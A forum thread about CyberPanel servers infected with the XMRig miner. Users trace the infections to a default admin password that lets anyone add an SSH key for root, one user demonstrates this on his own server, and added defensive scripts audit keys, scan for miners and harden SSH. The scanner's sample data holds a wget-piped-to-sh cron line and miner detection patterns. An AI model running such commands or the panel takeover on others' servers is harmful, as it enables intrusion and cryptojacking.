Infected with XMRig virus

The free version of OpenLiteSpeed was selected for installation.

I had a server with only CyberPanel installed, and somehow it got the XMRig Trojan two days later.

Are there any friends who have had a similar experience? I wonder why.

I've tested it on multiple servers and they all got infected, so I suspect it's a bug in CyberPanel.

What should I do now?

Just install a new panel, use only SSH keys to authenticate, and disable root login.
Your server is hacked, or there is something really wrong with CyberPanel security.

I suspect a security issue with the panel, as I tested this virus on multiple servers.

I just checked all my servers and none have it.
How do you log in over SSH, with a password or a key? Could your computer be infected?

I'm using Xshell 7 and logging in as root.

Is it a legit Xshell 7 or a cracked one? It sounds weird that multiple servers get XMRig as root. You should check that your computer does not have any malware.

The free version of Xshell 7 is available from the official website.

I checked my Win11 system; no malicious programs.

Try installing a fresh server with SSH keys, and disable password login and root login. Use the official install script, not any ready-made image or marketplace app.

Everyone must upgrade their CyberPanel installations, and if you are not technical enough to upgrade your CyberPanel, move out to a fresh CyberPanel installation.

As there has recently been a security release: Change Logs

I am using the installation command from the official website, so it should be the latest version.

I deployed two VPS servers with Ubuntu 20.04 from Vultr yesterday to test something out quickly. I installed CyberPanel and nothing else. Today both of them are infected with XMRig. Surely the root password from Vultr is secure enough, so the main vulnerability path would be that I left CyberPanel's admin password as the default 1234567. I also didn't configure any of the security settings, firewall, etc.

Any thoughts on what might have happened?

I can’t investigate further, since I immediately deleted both servers. But if someone can give some instructions on what I should log, I’m happy to set up a new VPS with the same config and just leave it to get hacked again.

Just checked all my servers and they are not affected by this.

Maybe, as @nick.chomey mentioned, could it be due to an unsecured password for the admin user?

My main server is fine, though this motivated me to finally secure it further. I just did the following:

  1. Create another user, give it root privileges, and set it up to connect with my public key.
  2. In /etc/ssh/sshd_config, set PermitRootLogin and PasswordAuthentication to no.

Though, now that I've done this and looked around a bit, what I'm guessing is that with a default CyberPanel password, anyone could log into the server and add an SSH key at https://site.com:8090/firewall/secureSSH, which would presumably give them full root access without any passwords.

Am I missing something? If not, is this a feature that should even exist within the panel?

And should we even be permitted to install CyberPanel with the default password? I think it would be prudent to force users either to choose one or to have a random one set by a command like openssl rand 60 | openssl base64 -A, which is then printed at the end of setup.

To test all of this, I'm currently deploying a new VPS where I will keep the default CyberPanel password, and I will try to add a public key to it and then try to connect to the server like that without "knowing" the root password.
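Added example (not code from CyberPanel or from anyone in this thread): the panel feature described above ends up writing a public key into /root/.ssh/authorized_keys, so the quickest way to tell whether it has been abused is to audit that file against the list of keys you actually issued. The script below does that in plain sh. The key material in its demo is constructed placeholder text, not real keys, and the allowlist path /root/keys.allow is only a suggestion.

```shell
#!/bin/sh
# Added example, not CyberPanel's code: audit an authorized_keys file against
# an allowlist of keys you issued yourself. Assumption: the allowlist holds one
# public key per line in the same "[options] type base64-blob [comment]" format
# as authorized_keys (the path /root/keys.allow below is just a suggestion).

# Print the base64 key blob from one authorized_keys line. Every SSH public key
# blob starts with "AAAA" (base64 of the 4-byte length field that begins the
# key type string), which is how the blob is told apart from options such as
# command="..." or no-pty that may precede it. Runs in a subshell so the
# "set -f" (no globbing while word-splitting) does not leak out.
key_blob() (
    set -f
    for field in $1; do
        case "$field" in
            AAAA*) printf '%s\n' "$field"; return 0 ;;
        esac
    done
    return 1
)

# Print every key in $1 whose blob is not in the allowlist $2, and return 1 if
# any was found. Matching is exact on the blob, so a changed comment, added
# options or a renamed key cannot disguise an entry.
audit_authorized_keys() {
    keys_file=$1
    allow_file=$2
    allowed=""
    while IFS= read -r line || [ -n "$line" ]; do
        blob=$(key_blob "$line") && allowed="$allowed$blob
"
    done < "$allow_file"
    found=0
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in ''|'#'*) continue ;; esac
        blob=$(key_blob "$line") || continue
        if ! printf '%s' "$allowed" | grep -q -x -F -- "$blob"; then
            printf 'UNKNOWN KEY: %s\n' "$line"
            found=1
        fi
    done < "$keys_file"
    return $found
}

# Constructed sample data so the check runs offline (the blobs are placeholder
# text, not real keys): one key we issued, plus one that looks like an entry a
# panel added on someone else's behalf.
demo_audit() {
    dir=$(mktemp -d)
    cat > "$dir/authorized_keys" <<'EOF'
# constructed sample authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKNOWNKEY000000000000000000000000 admin@laptop
no-pty ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEUNKNOWNKEY0000000000000000000000 added-via-panel
EOF
    printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKNOWNKEY000000000000000000000000 admin@laptop\n' \
        > "$dir/allowlist"
    if audit_authorized_keys "$dir/authorized_keys" "$dir/allowlist"; then rc=0; else rc=1; fi
    rm -rf "$dir"
    return $rc
}

# On a real host, as root:
#   audit_authorized_keys /root/.ssh/authorized_keys /root/keys.allow
```

Run it from cron or a monitoring agent and alert on a non-zero exit. Comparing the blob rather than the whole line is deliberate: the panel (or an attacker) can put any comment or option prefix on the line, but cannot change the blob without changing the key.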

@usmannasir I just successfully hacked my new vps server in 10 seconds with the above method.

I installed CyberPanel with the default password 1234567, went to Security -> Secure SSH and added the public key for my computer. Then from my SSH client I connected to the server with the IP, the root username and my private key. Anyone could use their own key, so long as they have the CyberPanel password.

I think it is crucial to disable the default password option and make the default random. If you want a dumb password for some quick testing purposes, you should have to enter it manually and receive a warning about it.

I also see that the random one is only 16 characters, from this mechanism: head /dev/urandom | tr -dc A-Za-z0-9 | head -c 16

Shouldn't it be made considerably longer? There's no real reason it couldn't be 50+ characters.

Moreover, how is this even possible? Should the CyberPanel user even have root access such that it can add a public key to the root user's home directory?

I will leave this VPS up and running and wait for it to get hacked again. I'll try to investigate when it does happen. Any suggestions for what to do and what to look for are welcome.
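Added example, not from the thread or from CyberPanel: since the plan is to leave a box up and watch it get hacked, here is a first-pass scan for the traces a cryptominer usually leaves. It is written to run over a file of collected process, cron and socket listings so the same scanner can be tried offline. The sample evidence inside it is constructed (pool host, IPs, paths and PIDs are placeholders), and the CPU threshold is an assumption.

```shell
#!/bin/sh
# Added example, not from the thread or from CyberPanel: a first-pass scan for
# what a miner such as XMRig leaves behind, run over a file of collected
# evidence (ps, cron, sockets). Indicators, all generic:
#   1. a process named xmrig, or launched with XMRig's --donate-level flag, or
#      pointed at a stratum+tcp:// / stratum+ssl:// pool URL
#   2. a cron line (or process) that pipes a downloaded script straight into sh
#   3. any process above CPU_THRESHOLD percent CPU in the ps section
# The threshold (assumption) is tunable: CPU_THRESHOLD=50 sh scan.sh

CPU_THRESHOLD=${CPU_THRESHOLD:-80}

# Collect evidence from a live host into $1 (run as root). The "### name"
# section headers let the scanner apply the CPU check only to ps output.
collect_evidence() {
    out=$1
    {
        echo "### ps";      ps aux
        echo "### cron";    cat /etc/crontab /etc/cron.d/* 2>/dev/null
        for u in $(cut -d: -f1 /etc/passwd); do
            crontab -l -u "$u" 2>/dev/null | sed "s/^/$u: /"
        done
        echo "### sockets"; ss -tnp 2>/dev/null
    } > "$out"
}

# Print each suspicious line of $1 prefixed with the indicator that fired.
# Returns 1 if anything fired, 0 if the file looks clean.
scan_for_miner() {
    file=$1
    hits=0
    if grep -i -E 'xmrig|stratum[+](tcp|ssl)://|--donate-level' "$file" \
            | sed 's/^/MINER-SIGNATURE: /' | grep .; then
        hits=1
    fi
    if grep -E '(curl|wget)[^|]*[|][[:space:]]*(sh|bash)([[:space:]]|$)' "$file" \
            | sed 's/^/REMOTE-EXEC: /' | grep .; then
        hits=1
    fi
    # ps aux: field 3 is %CPU. Only lines in the "### ps" section are checked,
    # so a renamed miner still shows up even if it carries no XMRig strings.
    if awk -v t="$CPU_THRESHOLD" '
            /^### / { sec = $2; next }
            sec == "ps" && $3 + 0 > t { print "HIGH-CPU: " $0 }' "$file" | grep .; then
        hits=1
    fi
    return $hits
}

# Constructed evidence (placeholder hosts, IPs, paths and PIDs), laid out the
# way collect_evidence writes it, so the scanner can be exercised offline.
demo_scan() {
    dir=$(mktemp -d)
    cat > "$dir/evidence" <<'EOF'
### ps
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 168000 11000 ? Ss 10:00 0:01 /sbin/init
root 2211 0.3 0.5 310000 42000 ? Sl 10:01 0:04 /usr/local/lsws/bin/lswsctrl
root 4873 197.0 1.2 2600000 99000 ? Sl 10:05 92:11 /tmp/.x/kthreadd -o stratum+tcp://pool.example.invalid:3333 --donate-level 1
### cron
*/10 * * * * root wget -q -O- http://example.invalid/update.sh | sh
0 3 * * * root /usr/local/bin/nightly-backup.sh
### sockets
ESTAB 0 0 10.0.0.5:49812 203.0.113.10:3333 users:(("kthreadd",pid=4873,fd=5))
EOF
    if scan_for_miner "$dir/evidence"; then rc=0; else rc=1; fi
    rm -rf "$dir"
    return $rc
}

# Live use, as root:  collect_evidence /root/evidence.txt && scan_for_miner /root/evidence.txt
```

In the constructed sample the miner is renamed to kthreadd and hidden in /tmp, so only the pool URL, the donate flag and the CPU usage give it away; the cron line is the usual persistence (re-download and re-run the dropper every ten minutes). Capture the evidence file before killing anything, and remember a miner that is already running will not be removed by cleaning cron alone.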

Hi, Nick. I appreciate you doing those tests.
I am a beginner at Linux. I only know that I am infected with the XMRig virus, but I do not know how to remove it. After your testing, have you found the problem now?
What can I do to make my server more secure?

@wang I would suggest deploying a new server and moving your websites to it. Set a strong password for the CyberPanel admin account, create a new system user and give it sudo privileges, turn off root login access, set up an SSH private/public key pair for the new user, install CSF, and so on.

If this is all too complicated, I would recommend checking out CloudPages, RunCloud or GridPane. They all offer excellent and easy VPS server management for an affordable price.
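Added example, not the poster's or CyberPanel's code, covering the server-side part of the advice given here and in the earlier post (new sudo user with a public key, PermitRootLogin and PasswordAuthentication off) plus a password generator for the panel admin account, since the thread also questions the 16-character default. It assumes a Debian/Ubuntu host (the sudo group, the sshd unit named ssh, config at /etc/ssh/sshd_config) and that you already generated a key pair on your workstation; the script changes nothing unless run with --apply. CSF installation is not covered beyond a pointer to its own documentation.

```shell
#!/bin/sh
# Added example, not CyberPanel's or the poster's code. Assumptions: a
# Debian/Ubuntu host (the "sudo" group and the sshd unit named "ssh"), and a
# public key already generated on the workstation with
#   ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519
# Run as root:  sh harden.sh --apply <newuser> <path/to/id_ed25519.pub>
# Without --apply only the functions are defined, so they can be tried on
# copies of the config first. Keep a second SSH session open until the new
# user's key login has been verified.

# Random alphanumeric password of $1 characters (default 50). Reading tr
# directly from /dev/urandom keeps pulling bytes until enough matching ones
# arrive; "head /dev/urandom | tr ..." reads a fixed number of "lines" first
# and can come up short for long passwords.
gen_password() {
    len=${1:-50}
    LC_ALL=C tr -dc 'A-Za-z0-9' < /dev/urandom | head -c "$len"
    echo
}

# Bits of entropy in an alphanumeric password of $1 characters: 62 symbols,
# so length * log2(62). 16 chars give 95 bits, 50 chars give 297.
password_bits() {
    awk -v n="$1" 'BEGIN { printf "%d\n", n * log(62) / log(2) }'
}

# Create user $1 in the sudo group and install the public key file $2 as its
# only authorized key. Modes matter: sshd ignores keys in a group- or
# world-writable ~/.ssh.
create_admin_user() {
    user=$1
    pubkey_file=$2
    id "$user" >/dev/null 2>&1 || useradd -m -s /bin/bash -G sudo "$user"
    home=$(getent passwd "$user" | cut -d: -f6)
    install -d -m 700 -o "$user" -g "$user" "$home/.ssh"
    install -m 600 -o "$user" -g "$user" "$pubkey_file" "$home/.ssh/authorized_keys"
}

# Rewrite the sshd config at $1: keys only, no root login. sshd uses the first
# value it sees for a directive, so the settings go at the very top, ahead of
# any Include line and any Match block, and every earlier occurrence (commented
# or not, including ones inside Match blocks) is dropped. If you need a
# per-user exception, add a Match block after running this.
harden_sshd_config() {
    cfg=$1
    tmp=$(mktemp)
    {
        printf '# hardened: key authentication only, no root login\n'
        printf 'PermitRootLogin no\n'
        printf 'PasswordAuthentication no\n'
        printf 'KbdInteractiveAuthentication no\n'
        printf 'ChallengeResponseAuthentication no\n'
        printf 'PubkeyAuthentication yes\n'
        grep -v -E '^[[:space:]]*#?[[:space:]]*(PermitRootLogin|PasswordAuthentication|KbdInteractiveAuthentication|ChallengeResponseAuthentication|PubkeyAuthentication)([[:space:]]|=)' "$cfg" || true
    } > "$tmp"
    cat "$tmp" > "$cfg"          # cat, not mv: keeps the file's owner and mode
    rm -f "$tmp"
}

if [ "${1:-}" = "--apply" ]; then
    [ "$#" -eq 3 ] || { echo "usage: $0 --apply <user> <pubkey-file>" >&2; exit 2; }
    create_admin_user "$2" "$3"
    cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
    harden_sshd_config /etc/ssh/sshd_config
    /usr/sbin/sshd -t && systemctl restart ssh      # restart only if the config parses
    printf 'Set this as the CyberPanel admin password: %s\n' "$(gen_password 50)"
    echo "Next: install CSF following its own documentation, then test a key login as $2 before closing this session."
fi
```

Order matters: create the user and verify `ssh -i ~/.ssh/id_ed25519 newuser@server` works from a second terminal before the sshd restart locks password and root logins out, and keep the .bak to restore from the provider console if something goes wrong.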

Do you want to give root permission to the new user?

How do I set up the SSH private key or public key?

How do I install CSF?

Manual installation is recommended.

Then try another provider... or install the OS only, then scan it. If it is clean, do a manual installation.
If that is clean too, then the problem is in your provider's pre-installed image.

Are you sure?
Better to test a manual installation.

Me too,
and I destroyed and reinstalled multiple times.

Agree.

What AV do you use?


By the way... are you using a nulled script or a GPL CMS?

It is quite obvious not to use 123456 as a password. I wonder how come people are using 123456 as a password? At least change it to something personalised and stronger. It's like setting your bank password to 123456 and expecting not to get hacked/robbed.


HOW THE XMRIG TROJAN VIRUS SNEAKS ONTO YOUR COMPUTER SYSTEM - Orenda Security